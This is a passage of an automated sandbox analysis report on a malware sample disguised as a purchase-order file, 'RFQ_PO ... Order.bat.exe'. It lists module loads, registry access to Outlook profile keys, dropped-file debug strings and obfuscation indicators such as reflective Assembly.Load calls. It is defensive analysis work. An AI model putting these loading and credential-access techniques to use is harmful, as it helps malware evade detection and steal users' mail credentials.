                  Source: C:\Windows\System32\Locator.exeSection loaded: dnsapi.dll
                  Source: C:\Windows\System32\Locator.exeSection loaded: iphlpapi.dll
                  Source: C:\Windows\System32\Locator.exeSection loaded: ntmarta.dll
                  Source: C:\Windows\System32\SensorDataService.exeSection loaded: kernel.appcore.dll
                  Source: C:\Windows\System32\SensorDataService.exeSection loaded: winhttp.dll
                  Source: C:\Windows\System32\SensorDataService.exeSection loaded: mpr.dll
                  Source: C:\Windows\System32\SensorDataService.exeSection loaded: secur32.dll
                  Source: C:\Windows\System32\SensorDataService.exeSection loaded: sspicli.dll
                  Source: C:\Windows\System32\SensorDataService.exeSection loaded: dnsapi.dll
                  Source: C:\Windows\System32\SensorDataService.exeSection loaded: iphlpapi.dll
                  Source: C:\Windows\System32\SensorDataService.exeSection loaded: mfplat.dll
                  Source: C:\Windows\System32\SensorDataService.exeSection loaded: rtworkq.dll
                  Source: C:\Windows\System32\SensorDataService.exeSection loaded: ntmarta.dll
                  Source: C:\Windows\System32\SensorDataService.exeSection loaded: windows.devices.perception.dll
                  Source: C:\Windows\System32\SensorDataService.exeSection loaded: mediafoundation.defaultperceptionprovider.dll
                  Source: C:\Windows\System32\SensorDataService.exeSection loaded: windows.devices.enumeration.dll
                  Source: C:\Windows\System32\SensorDataService.exeSection loaded: propsys.dll
                  Source: C:\Windows\System32\SensorDataService.exeSection loaded: structuredquery.dll
                  Source: C:\Windows\System32\SensorDataService.exeSection loaded: profapi.dll
                  Source: C:\Windows\System32\SensorDataService.exeSection loaded: windows.globalization.dll
                  Source: C:\Windows\System32\SensorDataService.exeSection loaded: bcp47langs.dll
                  Source: C:\Windows\System32\SensorDataService.exeSection loaded: bcp47mrm.dll
                  Source: C:\Windows\System32\SensorDataService.exeSection loaded: icu.dll
                  Source: C:\Windows\System32\SensorDataService.exeSection loaded: mswb7.dll
                  Source: C:\Windows\System32\SensorDataService.exeSection loaded: devdispitemprovider.dll
                  Source: C:\Windows\System32\snmptrap.exeSection loaded: winhttp.dll
                  Source: C:\Windows\System32\snmptrap.exeSection loaded: mpr.dll
                  Source: C:\Windows\System32\snmptrap.exeSection loaded: secur32.dll
                  Source: C:\Windows\System32\snmptrap.exeSection loaded: sspicli.dll
                  Source: C:\Windows\System32\snmptrap.exeSection loaded: dnsapi.dll
                  Source: C:\Windows\System32\snmptrap.exeSection loaded: iphlpapi.dll
                  Source: C:\Windows\System32\snmptrap.exeSection loaded: ntmarta.dll
                  Source: C:\Windows\System32\snmptrap.exeSection loaded: mswsock.dll
                  Source: C:\Windows\System32\snmptrap.exeSection loaded: napinsp.dll
                  Source: C:\Windows\System32\snmptrap.exeSection loaded: pnrpnsp.dll
                  Source: C:\Windows\System32\snmptrap.exeSection loaded: wshbth.dll
                  Source: C:\Windows\System32\snmptrap.exeSection loaded: nlaapi.dll
                  Source: C:\Windows\System32\snmptrap.exeSection loaded: winrnr.dll
                  Source: C:\Windows\System32\Spectrum.exeSection loaded: powrprof.dll
                  Source: C:\Windows\System32\Spectrum.exeSection loaded: rmclient.dll
                  Source: C:\Windows\System32\Spectrum.exeSection loaded: rmclient.dll
                  Source: C:\Windows\System32\Spectrum.exeSection loaded: kernel.appcore.dll
                  Source: C:\Windows\System32\Spectrum.exeSection loaded: kernel.appcore.dll
                  Source: C:\Windows\System32\Spectrum.exeSection loaded: spectrumsyncclient.dll
                  Source: C:\Windows\System32\Spectrum.exeSection loaded: kernel.appcore.dll
                  Source: C:\Windows\System32\Spectrum.exeSection loaded: kernel.appcore.dll
                  Source: C:\Windows\System32\Spectrum.exeSection loaded: umpdc.dll
                  Source: C:\Windows\System32\Spectrum.exeSection loaded: winhttp.dll
                  Source: C:\Windows\System32\Spectrum.exeSection loaded: mpr.dll
                  Source: C:\Windows\System32\Spectrum.exeSection loaded: secur32.dll
                  Source: C:\Windows\System32\Spectrum.exeSection loaded: sspicli.dll
                  Source: C:\Windows\System32\Spectrum.exeSection loaded: dnsapi.dll
                  Source: C:\Windows\System32\Spectrum.exeSection loaded: iphlpapi.dll
                  Source: C:\Windows\System32\Spectrum.exeSection loaded: ntmarta.dll
                  Source: C:\Windows\System32\Spectrum.exeSection loaded: perceptionsimulationextensions.dll
                  Source: C:\Windows\System32\Spectrum.exeSection loaded: hid.dll
                  Source: C:\Windows\System32\Spectrum.exeSection loaded: holographicruntimes.dll
                  Source: C:\Windows\System32\Spectrum.exeSection loaded: perceptiondevice.dll
                  Source: C:\Windows\System32\Spectrum.exeSection loaded: spatialstore.dll
                  Source: C:\Windows\System32\Spectrum.exeSection loaded: esent.dll
                  Source: C:\Windows\System32\Spectrum.exeSection loaded: analogcommonproxystub.dll
                  Source: C:\Windows\System32\Spectrum.exeSection loaded: capabilityaccessmanagerclient.dll
                  Source: C:\Windows\System32\Spectrum.exeSection loaded: wintypes.dll
                  Source: C:\Windows\System32\Spectrum.exeSection loaded: windows.devices.enumeration.dll
                  Source: C:\Windows\System32\Spectrum.exeSection loaded: propsys.dll
                  Source: C:\Windows\System32\Spectrum.exeSection loaded: structuredquery.dll
                  Source: C:\Windows\System32\Spectrum.exeSection loaded: profapi.dll
                  Source: C:\Windows\System32\Spectrum.exeSection loaded: windows.globalization.dll
                  Source: C:\Windows\System32\Spectrum.exeSection loaded: bcp47langs.dll
                  Source: C:\Windows\System32\Spectrum.exeSection loaded: bcp47mrm.dll
                  Source: C:\Windows\System32\Spectrum.exeSection loaded: icu.dll
                  Source: C:\Windows\System32\Spectrum.exeSection loaded: mswb7.dll
                  Source: C:\Windows\System32\Spectrum.exeSection loaded: devdispitemprovider.dll
                  Source: C:\Windows\System32\OpenSSH\ssh-agent.exeSection loaded: apphelp.dll
                  Source: C:\Windows\System32\OpenSSH\ssh-agent.exeSection loaded: libcrypto.dll
                  Source: C:\Windows\System32\OpenSSH\ssh-agent.exeSection loaded: cryptsp.dll
                  Source: C:\Windows\System32\OpenSSH\ssh-agent.exeSection loaded: winhttp.dll
                  Source: C:\Windows\System32\OpenSSH\ssh-agent.exeSection loaded: mpr.dll
                  Source: C:\Windows\System32\OpenSSH\ssh-agent.exeSection loaded: secur32.dll
                  Source: C:\Windows\System32\OpenSSH\ssh-agent.exeSection loaded: sspicli.dll
                  Source: C:\Windows\System32\OpenSSH\ssh-agent.exeSection loaded: dnsapi.dll
                  Source: C:\Windows\System32\OpenSSH\ssh-agent.exeSection loaded: iphlpapi.dll
                  Source: C:\Windows\System32\OpenSSH\ssh-agent.exeSection loaded: ntmarta.dll
                  Source: C:\Windows\System32\TieringEngineService.exeSection loaded: esent.dll
                  Source: C:\Windows\System32\TieringEngineService.exeSection loaded: clusapi.dll
                  Source: C:\Windows\System32\TieringEngineService.exeSection loaded: dnsapi.dll
                  Source: C:\Windows\System32\TieringEngineService.exeSection loaded: iphlpapi.dll
                  Source: C:\Windows\System32\TieringEngineService.exeSection loaded: winhttp.dll
                  Source: C:\Windows\System32\TieringEngineService.exeSection loaded: mpr.dll
                  Source: C:\Windows\System32\TieringEngineService.exeSection loaded: secur32.dll
                  Source: C:\Windows\System32\TieringEngineService.exeSection loaded: sspicli.dll
                  Source: C:\Windows\System32\TieringEngineService.exeSection loaded: kernel.appcore.dll
                  Source: C:\Windows\System32\TieringEngineService.exeSection loaded: ntmarta.dll
                  Source: C:\Windows\System32\AgentService.exeSection loaded: fltlib.dll
                  Source: C:\Windows\System32\AgentService.exeSection loaded: version.dll
                  Source: C:\Windows\System32\AgentService.exeSection loaded: activeds.dll
                  Source: C:\Windows\System32\AgentService.exeSection loaded: adsldpc.dll
                  Source: C:\Windows\System32\AgentService.exeSection loaded: msasn1.dll
                  Source: C:\Windows\System32\AgentService.exeSection loaded: winhttp.dll
                  Source: C:\Windows\System32\AgentService.exeSection loaded: mpr.dll
                  Source: C:\Windows\System32\AgentService.exeSection loaded: secur32.dll
                  Source: C:\Windows\System32\AgentService.exeSection loaded: sspicli.dll
                  Source: C:\Windows\System32\AgentService.exeSection loaded: dnsapi.dll
                  Source: C:\Windows\System32\AgentService.exeSection loaded: iphlpapi.dll
                  Source: C:\Windows\System32\AgentService.exeSection loaded: ntmarta.dll
                  Source: C:\Windows\System32\AgentService.exeSection loaded: kernel.appcore.dll
                  Source: C:\Windows\System32\AgentService.exeSection loaded: appmanagementconfiguration.dll
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: fastprox.dll
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: ncobjapi.dll
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dll
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dll
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: kernel.appcore.dll
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mpclient.dll
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: userenv.dll
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: version.dll
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: userenv.dll
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: msasn1.dll
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wmitomi.dll
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mi.dll
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dll
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dll
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: gpapi.dll
                  Source: C:\Windows\System32\vds.exeSection loaded: atl.dll
                  Source: C:\Windows\System32\vds.exeSection loaded: osuninst.dll
                  Source: C:\Windows\System32\vds.exeSection loaded: vdsutil.dll
                  Source: C:\Windows\System32\vds.exeSection loaded: bcd.dll
                  Source: C:\Windows\System32\vds.exeSection loaded: winhttp.dll
                  Source: C:\Windows\System32\vds.exeSection loaded: mpr.dll
                  Source: C:\Windows\System32\vds.exeSection loaded: secur32.dll
                  Source: C:\Windows\System32\vds.exeSection loaded: sspicli.dll
                  Source: C:\Windows\System32\vds.exeSection loaded: dnsapi.dll
                  Source: C:\Windows\System32\vds.exeSection loaded: iphlpapi.dll
                  Source: C:\Windows\System32\vds.exeSection loaded: ntmarta.dll
                  Source: C:\Windows\System32\vds.exeSection loaded: uexfat.dll
                  Source: C:\Windows\System32\vds.exeSection loaded: ulib.dll
                  Source: C:\Windows\System32\vds.exeSection loaded: ifsutil.dll
                  Source: C:\Windows\System32\vds.exeSection loaded: devobj.dll
                  Source: C:\Windows\System32\vds.exeSection loaded: uudf.dll
                  Source: C:\Windows\System32\vds.exeSection loaded: untfs.dll
                  Source: C:\Windows\System32\vds.exeSection loaded: ufat.dll
                  Source: C:\Windows\System32\vds.exeSection loaded: fmifs.dll
                  Source: C:\Windows\System32\vds.exeSection loaded: kernel.appcore.dll
                  Source: C:\Windows\System32\wbengine.exeSection loaded: vssapi.dll
                  Source: C:\Windows\System32\wbengine.exeSection loaded: virtdisk.dll
                  Source: C:\Windows\System32\wbengine.exeSection loaded: bcd.dll
                  Source: C:\Windows\System32\wbengine.exeSection loaded: spp.dll
                  Source: C:\Windows\System32\wbengine.exeSection loaded: netapi32.dll
                  Source: C:\Windows\System32\wbengine.exeSection loaded: xmllite.dll
                  Source: C:\Windows\System32\wbengine.exeSection loaded: clusapi.dll
                  Source: C:\Windows\System32\wbengine.exeSection loaded: wer.dll
                  Source: C:\Windows\System32\wbengine.exeSection loaded: vsstrace.dll
                  Source: C:\Windows\System32\wbengine.exeSection loaded: fltlib.dll
                  Source: C:\Windows\System32\wbengine.exeSection loaded: dnsapi.dll
                  Source: C:\Windows\System32\wbengine.exeSection loaded: srvcli.dll
                  Source: C:\Windows\System32\wbengine.exeSection loaded: netutils.dll
                  Source: C:\Windows\System32\wbengine.exeSection loaded: iphlpapi.dll
                  Source: C:\Windows\System32\wbengine.exeSection loaded: winhttp.dll
                  Source: C:\Windows\System32\wbengine.exeSection loaded: mpr.dll
                  Source: C:\Windows\System32\wbengine.exeSection loaded: secur32.dll
                  Source: C:\Windows\System32\wbengine.exeSection loaded: sspicli.dll
                  Source: C:\Windows\System32\wbengine.exeSection loaded: kernel.appcore.dll
                  Source: C:\Windows\System32\wbengine.exeSection loaded: ntmarta.dll
                  Source: C:\Windows\System32\wbengine.exeSection loaded: fveapi.dll
                  Source: C:\Windows\System32\wbengine.exeSection loaded: cscapi.dll
                  Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dll
                  Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dll
                  Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeSection loaded: winhttp.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeSection loaded: mpr.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeSection loaded: secur32.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeSection loaded: sspicli.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeSection loaded: dnsapi.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeSection loaded: iphlpapi.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeSection loaded: ntmarta.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeSection loaded: kernel.appcore.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeSection loaded: uxtheme.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeSection loaded: mscoree.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeSection loaded: vcruntime140_clr0400.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeSection loaded: ucrtbase_clr0400.dll
                  Source: C:\Users\user\Desktop\RFQ_PO N89397-GM7287-Order.bat.exe    Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32
                  Source: Window Recorder    Window detected: More than 3 window changes detected
                  Source: C:\Users\user\Desktop\RFQ_PO N89397-GM7287-Order.bat.exe    File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe    Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
                  Source: RFQ_PO N89397-GM7287-Order.bat.exe    Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                  Source: RFQ_PO N89397-GM7287-Order.bat.exe    Static PE information: Virtual size of .text is bigger than: 0x100000
                  Source: RFQ_PO N89397-GM7287-Order.bat.exe    Static file information: File size 1432064 > 1048576
                  Source: RFQ_PO N89397-GM7287-Order.bat.exe    Static PE information: Raw size of .text is bigger than: 0x100000 < 0x15aa00
                  Source: RFQ_PO N89397-GM7287-Order.bat.exe    Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                  Source: Binary string: E:\PkgInstaller\base\ntsetup\SrvPack.Main\tools\sfxcab\sfxcab\objfre\i386\sfxcab.pdb source: alg.exe, 0000000B.00000003.2009762179.0000000000B90000.00000004.00001000.00020000.00000000.sdmp, alg.exe, 0000000B.00000003.2009857048.0000000000400000.00000004.00001000.00020000.00000000.sdmp, elevation_service.exe, 00000012.00000003.2573298301.0000000000730000.00000004.00001000.00020000.00000000.sdmp, elevation_service.exe, 00000012.00000003.2573255343.00000000007C0000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\ktab_objs\ktab.pdb source: alg.exe, 0000000B.00000003.2036151480.0000000000400000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\jjs_objs\jjs.pdb source: alg.exe, 0000000B.00000003.2034574236.0000000000400000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: D:\dbs\el\ja2\Target\x86\ship\dcf\x-none\SpreadsheetCompare.pdb source: alg.exe, 0000000B.00000003.2062072594.0000000000B90000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: PresentationFontCache.pdb source: alg.exe, 0000000B.00000003.1991666348.00000000016C0000.00000004.00001000.00020000.00000000.sdmp, elevation_service.exe, 00000012.00000003.2527182119.0000000000DB0000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: mavinject32.pdbGCTL source: alg.exe, 0000000B.00000003.2011798103.0000000000B90000.00000004.00001000.00020000.00000000.sdmp, elevation_service.exe, 00000012.00000003.2576506040.0000000001460000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\pack200_objs\pack200.pdb source: alg.exe, 0000000B.00000003.2036762332.0000000000400000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: _.pdb source: vbc.exe, 0000002A.00000002.2656794908.0000000007376000.00000004.00000020.00020000.00000000.sdmp, vbc.exe, 0000002A.00000002.2688454630.0000000008741000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 0000002A.00000002.2669298938.0000000007590000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: D:\dbs\el\ja2\Target\x86\ship\dcf\x-none\Common.DBConnection.pdb source: alg.exe, 0000000B.00000003.2060589054.0000000000B90000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\rmiregistry_objs\rmiregistry.pdb source: alg.exe, 0000000B.00000003.2037617501.0000000000400000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: D:\T\BuildResults\bin\Release_x64\WebInstaller\AcroMiniServicesUpdater.pdb source: SingleClientServicesUpdater.exe.9.dr
                  Source: Binary string: D:\dbs\el\omr\Target\x64\ship\click2run\x-none\InspectorOfficeGadget.pdb source: alg.exe, 0000000B.00000003.2010753406.0000000000B90000.00000004.00001000.00020000.00000000.sdmp, elevation_service.exe, 00000012.00000003.2574637480.00000000007C0000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: D:\T\Acrobat\Installers\ShowAppPickerForPDF\Release_x64\ShowAppPickerForPDF.pdb source: alg.exe, 0000000B.00000003.2002253535.0000000000400000.00000004.00001000.00020000.00000000.sdmp, elevation_service.exe, 00000012.00000003.2563833897.0000000000730000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\tnameserv_objs\tnameserv.pdb source: alg.exe, 0000000B.00000003.2038419292.0000000000400000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\servertool_objs\servertool.pdb source: alg.exe, 0000000B.00000003.2037851037.0000000000400000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: MicrosoftEdgeUpdate_unsigned.pdb source: alg.exe, 0000000B.00000003.2050845345.0000000000B90000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: d:\dbs\el\omr\target\x86\ship\dcf\x-none\Common.ShowHelp.pdb00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000S source: Common.ShowHelp.exe.9.dr
                  Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\rmid_objs\rmid.pdb source: alg.exe, 0000000B.00000003.2037331399.0000000000400000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\java-rmi_objs\java-rmi.pdb source: alg.exe, 0000000B.00000003.2033387100.0000000000400000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: E:\PkgInstaller\base\ntsetup\SrvPack.Main\tools\sfxcab\sfxcab\objfre\i386\sfxcab.pdbU source: alg.exe, 0000000B.00000003.2009762179.0000000000B90000.00000004.00001000.00020000.00000000.sdmp, alg.exe, 0000000B.00000003.2009857048.0000000000400000.00000004.00001000.00020000.00000000.sdmp, elevation_service.exe, 00000012.00000003.2573298301.0000000000730000.00000004.00001000.00020000.00000000.sdmp, elevation_service.exe, 00000012.00000003.2573255343.00000000007C0000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: D:\T\BuildResults\bin\Release_x64\WebInstaller\AcroMiniServicesUpdater.pdbT source: SingleClientServicesUpdater.exe.9.dr
                  Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\keytool_objs\keytool.pdb source: alg.exe, 0000000B.00000003.2035106637.0000000000400000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\jjs_objs\jjs.pdb source: alg.exe, 0000000B.00000003.2034574236.0000000000400000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: mavinject32.pdb source: alg.exe, 0000000B.00000003.2011798103.0000000000B90000.00000004.00001000.00020000.00000000.sdmp, elevation_service.exe, 00000012.00000003.2576506040.0000000001460000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\policytool_objs\policytool.pdb source: alg.exe, 0000000B.00000003.2037004985.0000000000400000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: AppVDllSurrogate32.pdb source: alg.exe, 0000000B.00000003.2053440475.0000000000B90000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: D:\dbs\el\omr\Target\x64\ship\click2run\x-none\InspectorOfficeGadget.pdbY source: alg.exe, 0000000B.00000003.2010753406.0000000000B90000.00000004.00001000.00020000.00000000.sdmp, elevation_service.exe, 00000012.00000003.2574637480.00000000007C0000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: d:\dbs\el\omr\target\x86\ship\dcf\x-none\Common.ShowHelp.pdb source: Common.ShowHelp.exe.9.dr
                  Source: Binary string: GoogleUpdate_unsigned.pdb source: alg.exe, 0000000B.00000003.2031098154.0000000000B90000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: AppVlp.pdb source: alg.exe, 0000000B.00000003.2053936657.0000000000B90000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: D:\dbs\el\ja2\Target\x86\ship\dcf\x-none\Common.DBConnection.pdbn#n source: alg.exe, 0000000B.00000003.2060589054.0000000000B90000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\klist_objs\klist.pdb source: alg.exe, 0000000B.00000003.2035936901.0000000000400000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\ktab_objs\ktab.pdb source: alg.exe, 0000000B.00000003.2036151480.0000000000400000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: AppVDllSurrogate32.pdbGCTL source: alg.exe, 0000000B.00000003.2053440475.0000000000B90000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: D:\T\Acrobat\Installers\ShowAppPickerForPDF\Release_x64\ShowAppPickerForPDF.pdb$$ source: alg.exe, 0000000B.00000003.2002253535.0000000000400000.00000004.00001000.00020000.00000000.sdmp, elevation_service.exe, 00000012.00000003.2563833897.0000000000730000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\kinit_objs\kinit.pdb source: alg.exe, 0000000B.00000003.2035579850.0000000000400000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\orbd_objs\orbd.pdb source: alg.exe, 0000000B.00000003.2036511619.0000000000400000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\pack200_objs\pack200.pdb source: alg.exe, 0000000B.00000003.2036762332.0000000000400000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: PresentationFontCache.pdbHt^t Pt_CorExeMainmscoree.dll source: alg.exe, 0000000B.00000003.1991666348.00000000016C0000.00000004.00001000.00020000.00000000.sdmp, elevation_service.exe, 00000012.00000003.2527182119.0000000000DB0000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: D:\dbs\el\ja2\Target\x86\ship\dcf\x-none\DatabaseCompare.pdb source: alg.exe, 0000000B.00000003.2061513893.0000000000B90000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: AppVlp.pdbGCTL source: alg.exe, 0000000B.00000003.2053936657.0000000000B90000.00000004.00001000.00020000.00000000.sdmp

                  Data Obfuscation

                  Source: 0.2.RFQ_PO N89397-GM7287-Order.bat.exe.81e0000.4.raw.unpack, kAOj1Y7pfP90kycNNw.cs .Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
                  Source: 0.2.RFQ_PO N89397-GM7287-Order.bat.exe.4a424e8.1.raw.unpack, kAOj1Y7pfP90kycNNw.cs .Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
                  Source: 0.2.RFQ_PO N89397-GM7287-Order.bat.exe.81e0000.4.raw.unpack, GtaAIbrHXObmMm8GPA.cs .Net Code: vaH8QmOOp System.Reflection.Assembly.Load(byte[])
                  Source: 0.2.RFQ_PO N89397-GM7287-Order.bat.exe.4a424e8.1.raw.unpack, GtaAIbrHXObmMm8GPA.cs .Net Code: vaH8QmOOp System.Reflection.Assembly.Load(byte[])
                  Source: RFQ_PO N89397-GM7287-Order.bat.exe Static PE information: 0xC6CF0F5C [Wed Sep 11 20:17:32 2075 UTC]
                  Source: pingsender.exe.9.dr Static PE information: section name: .00cfg
                  Source: pingsender.exe.9.dr Static PE information: section name: .voltbl
                  Source: plugin-container.exe.9.dr Static PE information: section name: .00cfg
                  Source: plugin-container.exe.9.dr Static PE information: section name: .voltbl
                  Source: private_browsing.exe.9.dr Static PE information: section name: .00cfg
                  Source: private_browsing.exe.9.dr Static PE information: section name: .voltbl
                  Source: updater.exe.9.dr Static PE information: section name: .00cfg
                  Source: updater.exe.9.dr Static PE information: section name: .voltbl
                  Source: updater.exe.9.dr Static PE information: section name: _RDATA
                  Source: armsvc.exe.9.dr Static PE information: section name: .didat
                  Source: alg.exe.9.dr Static PE information: section name: .didat
                  Source: FXSSVC.exe.9.dr Static PE information: section name: .didat
                  Source: elevation_service.exe.9.dr Static PE information: section name: .00cfg
                  Source: elevation_service.exe.9.dr Static PE information: section name: .gxfg
                  Source: elevation_service.exe.9.dr Static PE information: section name: .retplne
                  Source: elevation_service.exe.9.dr Static PE information: section name: _RDATA
                  Source: elevation_service.exe.9.dr Static PE information: section name: malloc_h
                  Source: elevation_service.exe0.9.dr Static PE information: section name: .00cfg
                  Source: elevation_service.exe0.9.dr Static PE information: section name: .gxfg
                  Source: elevation_service.exe0.9.dr Static PE information: section name: .retplne
                  Source: elevation_service.exe0.9.dr Static PE information: section name: _RDATA
                  Source: elevation_service.exe0.9.dr Static PE information: section name: malloc_h
                  Source: maintenanceservice.exe.9.dr Static PE information: section name: .00cfg
                  Source: maintenanceservice.exe.9.dr Static PE information: section name: .voltbl
                  Source: maintenanceservice.exe.9.dr Static PE information: section name: _RDATA
                  Source: msdtc.exe.9.dr Static PE information: section name: .didat
                  Source: GoogleCrashHandler64.exe.9.dr Static PE information: section name: _RDATA
                  Source: GoogleCrashHandler64.exe.9.dr Static PE information: section name: .gxfg
                  Source: GoogleCrashHandler64.exe.9.dr Static PE information: section name: .gehcont
                  Source: GoogleUpdateComRegisterShell64.exe.9.dr Static PE information: section name: _RDATA
                  Source: GoogleUpdateComRegisterShell64.exe.9.dr Static PE information: section name: .gxfg
                  Source: GoogleUpdateComRegisterShell64.exe.9.dr Static PE information: section name: .gehcont
                  Source: 117.0.5938.134_117.0.5938.132_chrome_updater.exe.9.dr Static PE information: section name: .00cfg
                  Source: 117.0.5938.134_117.0.5938.132_chrome_updater.exe.9.dr Static PE information: section name: .retplne
                  Source: 117.0.5938.134_117.0.5938.132_chrome_updater.exe0.9.dr Static PE information: section name: .00cfg
                  Source: 117.0.5938.134_117.0.5938.132_chrome_updater.exe0.9.dr Static PE information: section name: .retplne
                  Source: msiexec.exe.9.dr Static PE information: section name: .didat
                  Source: MsSense.exe.9.dr Static PE information: section name: .didat
